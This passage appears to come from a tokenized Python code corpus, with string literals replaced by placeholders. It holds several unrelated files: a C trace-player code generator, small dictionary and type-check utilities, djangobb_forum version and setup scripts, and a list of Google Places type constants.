"<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:3> , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> if "<STR_LIT>" in config : <EOL> for fileName in config [ "<STR_LIT>" ] : <EOL> f = open ( config . getRelativePath ( fileName ) ) <EOL> print >> traceFile , f . read ( ) <EOL> f . close ( ) <EOL> if dataFile : <EOL> if dataFileFormat == "<STR_LIT>" : <EOL> print >> dataFile , "<STR_LIT:#>" <EOL> print >> dataFile , "<STR_LIT>" % ( len ( trace . events ) , frameCount ) <EOL> print >> dataFile , "<STR_LIT:#>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> else : <EOL> print >> dataFile , "<STR_LIT:;>" <EOL> print >> dataFile , "<STR_LIT>" % ( len ( trace . events ) , frameCount ) <EOL> print >> dataFile , "<STR_LIT:;>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> print >> traceFile , "<STR_LIT>" % ( objectTypes [ obj ] , objectId ( obj ) , objectTypes [ obj ] , obj . id ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> task . step ( ) <EOL> print >> traceFile , "<STR_LIT>" % len ( arrays ) <EOL> for i , array in enumerate ( arrays . values ( ) ) : <EOL> a = arrayId ( array ) <EOL> if usePersistentArrays : <EOL> l = arraySizes [ a ] <EOL> if not l : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % str ( a ) ) <EOL> l = <NUM_LIT:1> <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ a ] , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , i , l ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ a ] , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , i ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> arrayData = [ ] <EOL> arrayMap = { } <EOL> for variants in arrayVariants . values ( ) : <EOL> for array in variants : <EOL> for j , existingArray in enumerate ( arrayData ) : <EOL> if existingArray == array and existingArray . __class__ == array . __class__ : <EOL> arrayMap [ id ( array ) ] = j <EOL> break <EOL> else : <EOL> arrayMap [ id ( array ) ] = len ( arrayData ) <EOL> arrayData . append ( array ) <EOL> if not dataFile : <EOL> for i , array in enumerate ( arrayData ) : <EOL> if not len ( array ) : <EOL> continue <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> continue <EOL> elif usePersistentArrays : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> print >> traceFile , indent , <EOL> qualifier = "<STR_LIT>" <EOL> format = "<STR_LIT:s>" <EOL> if len ( array ) : <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> format = qualifier = "<STR_LIT:f>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> format = qualifier = "<STR_LIT:d>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> format = qualifier = "<STR_LIT:l>" <EOL> for k , value in enumerate ( array ) : <EOL> value = ( "<STR_LIT>" % ( format , qualifier ) ) % value <EOL> if k != len ( array ) - <NUM_LIT:1> : <EOL> print >> traceFile , "<STR_LIT>" % value , <EOL> if not ( k + <NUM_LIT:1> ) % <NUM_LIT:8> : <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , indent , <EOL> else : <EOL> print >> traceFile , value <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> else : <EOL> for i , array in enumerate ( arrayData ) : <EOL> if not len ( array ) : <EOL> continue <EOL> if usePersistentArrays and not isinstance ( array , Trace . ObjectArrayValue ) : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> continue <EOL> if dataFileFormat == "<STR_LIT>" : <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ShortArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ByteArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . IntegerArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> print >> dataFile , "<STR_LIT>" % ( typeCode , "<STR_LIT:U+002CU+0020>" . join ( map ( str , array ) ) ) <EOL> else : <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ShortArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ByteArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . IntegerArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> prefix = "<STR_LIT>" % typeCode <EOL> for j in xrange ( <NUM_LIT:0> , len ( array ) , <NUM_LIT:8> ) : <EOL> values = array [ j : j + <NUM_LIT:8> ] <EOL> print >> dataFile , prefix , "<STR_LIT:U+002C>" . join ( map ( str , values ) ) <EOL> print >> traceFile , "<STR_LIT>" % ( initFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> def getObjectAttributeValue ( attr ) : <EOL> if isinstance ( attr , Trace . Array ) : <EOL> assert isinstance ( attr , Trace . ByteArrayValue ) <EOL> s = "<STR_LIT>" . join ( ( chr ( c ) for c in attr ) ) <EOL> s = s . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) <EOL> s = s . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) <EOL> s = s . rstrip ( "<STR_LIT:\x00>" ) <EOL> lines = s . split ( "<STR_LIT:\n>" ) <EOL> return "<STR_LIT:\n>" . join ( ( '<STR_LIT>' % l for l in lines ) ) <EOL> return str ( attr ) <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> cClass = library . classes . get ( obj . cls . name ) <EOL> if obj . attrs or ( not obj in outValueObjects and cClass and cClass . overridable ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . name , "<STR_LIT:U+002CU+0020>" . join ( obj . attrs . keys ( ) ) ) <EOL> if obj . attrs : <EOL> attrs = "<STR_LIT:U+002CU+0020>" . join ( map ( getObjectAttributeValue , obj . attrs . values ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , len ( obj . attrs ) + <NUM_LIT:1> , playerArgument , attrs ) <EOL> else : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( uninitFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> cClass = library . classes . get ( obj . cls . name ) <EOL> if obj . attrs or ( not obj in outValueObjects and cClass and cClass . overridable ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . name , playerArgument , objectId ( obj ) ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> task . finish ( ) <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> frameNumber = <NUM_LIT:0> <EOL> frameFunctions = [ "<STR_LIT>" % frameFuncName ] <EOL> activeArrays = dict ( [ ( a , None ) for a in arrays . keys ( ) ] ) <EOL> print >> traceFile , "<STR_LIT>" % ( frameFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> for event in trace . events : <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> for obj in event . modifiedObjects : <EOL> if obj . attrs and obj . attrs != classes [ obj . cls ] [ objectId ( obj ) ] . attrs : <EOL> attrs = "<STR_LIT:U+002CU+0020>" . join ( map ( getObjectAttributeValue , obj . attrs . values ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . name , "<STR_LIT:U+002CU+0020>" . join ( obj . attrs . keys ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , len ( obj . attrs ) + <NUM_LIT:2> , playerArgument , objectId ( obj ) , attrs ) <EOL> classes [ obj . cls ] [ objectId ( obj ) ] . attrs = obj . attrs <EOL> for array in event . modifiedArrays : <EOL> a = arrayId ( array ) <EOL> if not id ( array ) in arrayMap : <EOL> continue <EOL> toArray = arrays . index ( a ) <EOL> fromArray = arrayMap [ id ( array ) ] <EOL> if activeArrays [ a ] == fromArray : <EOL> continue <EOL> if not len ( array ) : <EOL> continue <EOL> activeArrays [ a ] = fromArray <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> for i , obj in enumerate ( array ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , toArray , i , objectId ( obj ) ) <EOL> elif usePersistentArrays : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , toArray , arrayPrefix , fromArray , len ( array ) ) <EOL> else : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , toArray , arrayPrefix , fromArray ) <EOL> args = [ ] <EOL> returnValue = None <EOL> for name , value in event . values . items ( ) : <EOL> valueType = name and function . parameters [ name ] . type or function . type <EOL> if value is None : <EOL> value = "<STR_LIT>" % valueType <EOL> elif isinstance ( value , Trace . Array ) : <EOL> if not valueType . isConstant ( ) and value in event . modifiedArrays : <EOL> a = arrayId ( value ) <EOL> activeArrays [ a ] = None <EOL> if not value . id : <EOL> value = "<STR_LIT>" % valueType <EOL> else : <EOL> a = arrayId ( value ) <EOL> value = "<STR_LIT>" % ( valueType , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , arrays . index ( a ) ) <EOL> elif isinstance ( value , Trace . Object ) : <EOL> value = str ( objectId ( value ) ) <EOL> elif isinstance ( value , Trace . UnknownPhrase ) : <EOL> value = "<STR_LIT>" % valueType <EOL> else : <EOL> value = StringUtils . decorateValue ( library , function , name , value ) <EOL> if isinstance ( value , Trace . FloatValue ) : <EOL> value = str ( value ) + "<STR_LIT:f>" <EOL> elif isinstance ( value , Trace . DoubleValue ) : <EOL> value = str ( value ) + "<STR_LIT:d>" <EOL> elif isinstance ( value , Trace . LongValue ) : <EOL> value = str ( value ) + "<STR_LIT:l>" <EOL> if name and library . isPointerType ( function . parameters [ name ] . type ) : <EOL> value = "<STR_LIT>" % ( valueType , value ) <EOL> try : <EOL> if name and "<STR_LIT>" in str ( library . resolveType ( function . parameters [ name ] . type ) ) and int ( value ) < <NUM_LIT:0> : <EOL> value = "<STR_LIT>" % ( function . parameters [ name ] . type , value ) <EOL> except ValueError : <EOL> pass <EOL> if event . name == "<STR_LIT>" and name and str ( value ) == "<STR_LIT:0>" : <EOL> value = "<STR_LIT>" <EOL> assert len ( str ( value ) ) <EOL> if name : <EOL> args . append ( str ( value ) ) <EOL> else : <EOL> returnValue = value <EOL> if not len ( args ) == len ( function . parameters ) : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % ( event . name , "<STR_LIT:U+002CU+0020>" . join ( args ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( event . name , "<STR_LIT:U+002CU+0020>" . join ( args ) ) <EOL> continue <EOL> returnObject = event . values . get ( None , None ) <EOL> if isinstance ( returnObject , Trace . Object ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % objectId ( returnObject ) , <EOL> else : <EOL> print >> traceFile , indent , <EOL> args = "<STR_LIT:U+002CU+0020>" . join ( args ) <EOL> print >> traceFile , "<STR_LIT>" % ( event . name , args ) <EOL> for array in event . modifiedArrays : <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> for i , obj in enumerate ( array ) : <EOL> a = arrayId ( array ) <EOL> fromArray = arrays . index ( a ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , fromArray , i ) <EOL> if ( not frameMarkers and function . isFrameMarker ) or event in frameMarkers : <EOL> frameNumber += <NUM_LIT:1> <EOL> name = "<STR_LIT>" % ( frameFuncName , frameNumber ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % frameNumber <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( name , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> frameFunctions . append ( name ) <EOL> task . step ( ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playerArgument ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> print >> traceFile , indent , "<STR_LIT>" % ( initFuncName , playerArgument ) <EOL> for name in frameFunctions : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( name , playerArgument ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( uninitFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playerArgument ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playFrameFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:{>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( <NUM_LIT:0> , initFuncName , playerArgument ) <EOL> for i , name in enumerate ( frameFunctions ) : <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( i + <NUM_LIT:1> , name , playerArgument ) <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( len ( frameFunctions ) + <NUM_LIT:1> , uninitFuncName , playerArgument ) <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:}>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> if dataFile : <EOL> dataFile . close ( ) <EOL> task . finish ( ) </s>
<s> """<STR_LIT>""" <EOL> class DefaultDict ( dict ) : <EOL> def __init__ ( self , default = int ) : <EOL> self . default = default <EOL> dict . __init__ ( self ) <EOL> def __getitem__ ( self , name ) : <EOL> try : <EOL> return dict . __getitem__ ( self , name ) <EOL> except KeyError : <EOL> item = self . default ( ) <EOL> self [ name ] = item <EOL> return item <EOL> class DictProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dictionary ) : <EOL> self . dictionary = dictionary <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> return getattr ( self . dictionary , name ) <EOL> except AttributeError : <EOL> return self . dictionary [ name ] <EOL> def __getitem__ ( self , name ) : <EOL> return self . dictionary [ name ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT:[>" + "<STR_LIT:U+002CU+0020>" . join ( self . dictionary . keys ( ) ) + "<STR_LIT:]>" <EOL> def inverseDict ( d ) : <EOL> """<STR_LIT>""" <EOL> return dict ( zip ( d . values ( ) , d . keys ( ) ) ) <EOL> def flatten ( seq ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for item in seq : <EOL> if hasattr ( item , "<STR_LIT>" ) and not isinstance ( item , basestring ) : <EOL> result . extend ( flatten ( item ) ) <EOL> else : <EOL> result . append ( item ) <EOL> return result </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __revision__ = "<STR_LIT>" [ <NUM_LIT:11> : - <NUM_LIT:2> ] <EOL> import types <EOL> def _errmsg ( argname , ltd , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if errmsgExtra : <EOL> errmsgExtra = '<STR_LIT:\n>' + errmsgExtra <EOL> return "<STR_LIT>" % ( argname , ltd , errmsgExtra ) <EOL> def VerifyType ( arg , argname , legalTypes , ltd , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if type ( arg ) not in legalTypes : <EOL> m = _errmsg ( argname , ltd , errmsgExtra ) <EOL> raise TypeError ( m ) <EOL> def VerifyTypeClass ( arg , argname , legalTypes , ltd , klass , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> VerifyType ( arg , argname , legalTypes , ltd , errmsgExtra ) <EOL> if type ( arg ) == types . ClassType and not issubclass ( arg , klass ) : <EOL> m = _errmsg ( argname , ltd , errmsgExtra ) <EOL> raise TypeError ( m ) </s>
<s> from . core import * </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> default_app_config = '<STR_LIT>' <EOL> version_info = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , '<STR_LIT:a>' , <NUM_LIT:0> ) <EOL> def get_version ( ) : <EOL> "<STR_LIT>" <EOL> version = '<STR_LIT>' % ( version_info [ : <NUM_LIT:3> ] ) <EOL> if version_info [ <NUM_LIT:3> ] != '<STR_LIT:f>' : <EOL> import os <EOL> version = '<STR_LIT>' % version_info <EOL> dir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> hg_dir = os . path . normpath ( os . path . join ( dir , '<STR_LIT>' ) ) <EOL> if os . path . isdir ( os . path . join ( hg_dir , '<STR_LIT>' ) ) : <EOL> hg_rev = '<STR_LIT>' <EOL> try : <EOL> from mercurial import ui , hg , error <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> repo = hg . repository ( ui . ui ( ) , hg_dir ) <EOL> c = repo [ '<STR_LIT>' ] <EOL> hg_rev = '<STR_LIT>' % ( c . rev ( ) ) <EOL> except error . RepoError : <EOL> pass <EOL> version = '<STR_LIT>' % ( version , hg_rev ) <EOL> return version <EOL> __version__ = get_version ( ) </s>
<s> from setuptools import setup , find_packages <EOL> from setuptools . command . install_lib import install_lib as _install_lib <EOL> from distutils . command . build import build as _build <EOL> from distutils . cmd import Command <EOL> from djangobb_forum import get_version <EOL> class compile_translations ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> import os <EOL> from django . core . management import execute_from_command_line , CommandError <EOL> curdir = os . getcwd ( ) <EOL> forum_dir = os . path . realpath ( '<STR_LIT>' ) <EOL> os . chdir ( forum_dir ) <EOL> try : <EOL> execute_from_command_line ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except CommandError : <EOL> pass <EOL> finally : <EOL> os . chdir ( curdir ) <EOL> class build ( _build ) : <EOL> sub_commands = [ ( '<STR_LIT>' , None ) ] + _build . sub_commands <EOL> class install_lib ( _install_lib ) : <EOL> def run ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> _install_lib . run ( self ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = get_version ( ) , <EOL> description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> setup_requires = [ '<STR_LIT>' ] , <EOL> install_requires = open ( '<STR_LIT>' ) . readlines ( ) , <EOL> keywords = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> cmdclass = { '<STR_LIT>' : build , '<STR_LIT>' : install_lib , <EOL> '<STR_LIT>' : compile_translations } <EOL> ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> scripts = [ '<STR_LIT>' ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> TYPE_ACCOUNTING = '<STR_LIT>' <EOL> TYPE_AIRPORT = '<STR_LIT>' <EOL> TYPE_AMUSEMENT_PARK = '<STR_LIT>' <EOL> TYPE_AQUARIUM = '<STR_LIT>' <EOL> TYPE_ART_GALLERY = '<STR_LIT>' <EOL> TYPE_ATM = '<STR_LIT>' <EOL> TYPE_BAKERY = '<STR_LIT>' <EOL> TYPE_BANK = '<STR_LIT>' <EOL> TYPE_BAR = '<STR_LIT:bar>' <EOL> TYPE_BEAUTY_SALON = '<STR_LIT>' <EOL> TYPE_BICYCLE_STORE = '<STR_LIT>' <EOL> TYPE_BOOK_STORE = '<STR_LIT>' <EOL> TYPE_BOWLING_ALLEY = '<STR_LIT>' <EOL> TYPE_BUS_STATION = '<STR_LIT>' <EOL> TYPE_CAFE = '<STR_LIT>' <EOL> TYPE_CAMPGROUND = '<STR_LIT>' <EOL> TYPE_CAR_DEALER = '<STR_LIT>' <EOL> TYPE_CAR_RENTAL = '<STR_LIT>' <EOL> TYPE_CAR_REPAIR = '<STR_LIT>' <EOL> TYPE_CAR_WASH = '<STR_LIT>' <EOL> TYPE_CASINO = '<STR_LIT>' <EOL> TYPE_CEMETERY = '<STR_LIT>' <EOL> TYPE_CHURCH = '<STR_LIT>' <EOL> TYPE_CITY_HALL = '<STR_LIT>' <EOL> TYPE_CLOTHING_STORE = '<STR_LIT>' <EOL> TYPE_CONVENIENCE_STORE = '<STR_LIT>' <EOL> TYPE_COURTHOUSE = '<STR_LIT>' <EOL> TYPE_DENTIST = '<STR_LIT>' <EOL> TYPE_DEPARTMENT_STORE = '<STR_LIT>' <EOL> TYPE_DOCTOR = '<STR_LIT>' <EOL> TYPE_ELECTRICIAN = '<STR_LIT>' <EOL> TYPE_ELECTRONICS_STORE = '<STR_LIT>' <EOL> TYPE_EMBASSY = '<STR_LIT>' <EOL> TYPE_ESTABLISHMENT = '<STR_LIT>' <EOL> TYPE_FINANCE = '<STR_LIT>' <EOL> TYPE_FIRE_STATION = '<STR_LIT>' <EOL> TYPE_FLORIST = '<STR_LIT>' <EOL> TYPE_FOOD = '<STR_LIT>' <EOL> TYPE_FUNERAL_HOME = '<STR_LIT>' <EOL> TYPE_FURNITURE_STORE = '<STR_LIT>' <EOL> TYPE_GAS_STATION = '<STR_LIT>' <EOL> TYPE_GENERAL_CONTRACTOR = '<STR_LIT>' <EOL> TYPE_GEOCODE = '<STR_LIT>' <EOL> TYPE_GROCERY_OR_SUPERMARKET = '<STR_LIT>' <EOL> TYPE_GYM = '<STR_LIT>' <EOL> TYPE_HAIR_CARE = '<STR_LIT>' <EOL> TYPE_HARDWARE_STORE = '<STR_LIT>' <EOL> TYPE_HEALTH = '<STR_LIT>' <EOL> TYPE_HINDU_TEMPLE = '<STR_LIT>' <EOL> TYPE_HOME_GOODS_STORE = '<STR_LIT>' <EOL> TYPE_HOSPITAL = '<STR_LIT>' <EOL> TYPE_INSURANCE_AGENCY = '<STR_LIT>' <EOL> TYPE_JEWELRY_STORE = '<STR_LIT>' <EOL> TYPE_LAUNDRY = '<STR_LIT>' <EOL> TYPE_LAWYER = '<STR_LIT>' <EOL> TYPE_LIBRARY = '<STR_LIT>' <EOL> TYPE_LIQUOR_STORE = '<STR_LIT>' <EOL> TYPE_LOCAL_GOVERNMENT_OFFICE = '<STR_LIT>' <EOL> TYPE_LOCKSMITH = '<STR_LIT>' <EOL> TYPE_LODGING = '<STR_LIT>' <EOL> TYPE_MEAL_DELIVERY = '<STR_LIT>' <EOL> TYPE_MEAL_TAKEAWAY = '<STR_LIT>' <EOL> TYPE_MOSQUE = '<STR_LIT>' <EOL> TYPE_MOVIE_RENTAL = '<STR_LIT>' <EOL> TYPE_MOVIE_THEATER = '<STR_LIT>' <EOL> TYPE_MOVING_COMPANY = '<STR_LIT>' <EOL> TYPE_MUSEUM = '<STR_LIT>' <EOL> TYPE_NIGHT_CLUB = '<STR_LIT>' <EOL> TYPE_PAINTER = '<STR_LIT>' <EOL> TYPE_PARK = '<STR_LIT>' <EOL> TYPE_PARKING = '<STR_LIT>' <EOL> TYPE_PET_STORE = '<STR_LIT>' <EOL> TYPE_PHARMACY = '<STR_LIT>' <EOL> TYPE_PHYSIOTHERAPIST = '<STR_LIT>' <EOL> TYPE_PLACE_OF_WORSHIP = '<STR_LIT>' <EOL> TYPE_PLUMBER = '<STR_LIT>' <EOL> TYPE_POLICE = '<STR_LIT>' <EOL> TYPE_POST_OFFICE = '<STR_LIT>' <EOL> TYPE_REAL_ESTATE_AGENCY = '<STR_LIT>' <EOL> TYPE_RESTAURANT = '<STR_LIT>' <EOL> TYPE_ROOFING_CONTRACTOR = '<STR_LIT>' <EOL> TYPE_RV_PARK = '<STR_LIT>' <EOL> TYPE_SCHOOL = '<STR_LIT>' <EOL> TYPE_SHOE_STORE = '<STR_LIT>' <EOL> TYPE_SHOPPING_MALL = '<STR_LIT>' <EOL> TYPE_SPA = '<STR_LIT>' <EOL> TYPE_STADIUM = '<STR_LIT>' <EOL> TYPE_STORAGE = '<STR_LIT>' <EOL> TYPE_STORE = '<STR_LIT:store>' <EOL> TYPE_SUBWAY_STATION = '<STR_LIT>' <EOL> TYPE_SYNAGOGUE = '<STR_LIT>' <EOL> TYPE_TAXI_STAND = '<STR_LIT>' <EOL> TYPE_TRAIN_STATION = '<STR_LIT>' <EOL> TYPE_TRAVEL_AGENCY = '<STR_LIT>' <EOL> TYPE_UNIVERSITY = '<STR_LIT>' <EOL> TYPE_VETERINARY_CARE = '<STR_LIT>' <EOL> TYPE_ZOO = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_1 = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_2 = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_3 = '<STR_LIT>' <EOL> TYPE_COLLOQUIAL_AREA = '<STR_LIT>' <EOL> TYPE_COUNTRY = '<STR_LIT>' <EOL> TYPE_FLOOR = '<STR_LIT>' <EOL> TYPE_INTERSECTION = '<STR_LIT>' <EOL> TYPE_LOCALITY = '<STR_LIT>' <EOL> TYPE_NATURAL_FEATURE = '<STR_LIT>' <EOL> TYPE_NEIGHBORHOOD = '<STR_LIT>' <EOL> TYPE_POLITICAL = '<STR_LIT>' <EOL> TYPE_POINT_OF_INTEREST = '<STR_LIT>' <EOL> TYPE_POST_BOX = '<STR_LIT>' <EOL> TYPE_POSTAL_CODE = '<STR_LIT>' <EOL> TYPE_POSTAL_CODE_PREFIX = '<STR_LIT>' <EOL> TYPE_POSTAL_TOWN = '<STR_LIT>' <EOL> TYPE_PREMISE = '<STR_LIT>' <EOL> TYPE_ROOM = '<STR_LIT>' <EOL> TYPE_ROUTE = '<STR_LIT>' <EOL> TYPE_STREET_ADDRESS = '<STR_LIT>' <EOL> TYPE_STREET_NUMBER = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_4 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_5 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_3 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_2 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_1 = 